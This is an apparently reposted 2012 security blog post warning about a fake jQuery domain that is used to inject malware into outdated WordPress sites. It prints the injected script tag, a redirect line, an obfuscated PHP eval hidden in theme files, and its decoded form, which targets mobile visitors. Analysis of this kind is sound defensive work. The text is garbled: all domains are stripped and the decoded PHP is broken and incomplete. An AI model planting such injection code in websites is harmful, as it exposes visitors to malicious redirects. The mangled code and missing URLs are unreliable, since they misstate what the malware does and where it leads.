Careful With Fake jQuery Website – jquery-framework. com

A few days ago we posted in our Labs notes about a Fake jQuery website that is distributing malware. The domain was properly chosen to confuse the end-users ( ), since it looks like a valid site.

This is what we were seeing injected on some websites:

<script src="httx://

Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to

window.location = "";

Which then redirects the browser to additional malicious domains. This is the full path: -> -> ->

or -> -> -> ->

Compromised WordPress sites

Since we initially started seeing this and posted in our Labs, we’re seeing even more websites compromised with it (mostly on outdated WordPress). We had the chance to analyze some of them and they had the following eval code being used to hide the malware (inside the theme files):

eval ("145166141154�50142 .. 141163145�66�64137")

Which when decoded executes the following:

if ((preg_match('/text/vnd.wap.wml|application/vnd.wap.xhtml+xml/si', @$_SERVER['HTTP_ACCEPT']) ||
vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || 
       preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER'])) && 
@$_SERVER['HTTP_USER_AGENT'])) { echo "<script src="httx://"..'; 
exit; }

If you are not familiar with PHP, it will check if you are visiting the site from a mobile phone (ipod, ipad, iphone, etc) and if you are, it inserts the code on the site. Since Google (and other AV blacklists) aren’t flagging this domain, users will receive no warning of what is happening.

We’re definitely flagging it, make sure to scan your site for free using Sucuri SiteCheck to make sure you’re good to go.

Read more: Careful With Fake jQuery Website – jquery-framework. com

Incoming search terms

Story added 17. September 2012, content source with full text you can find at link above.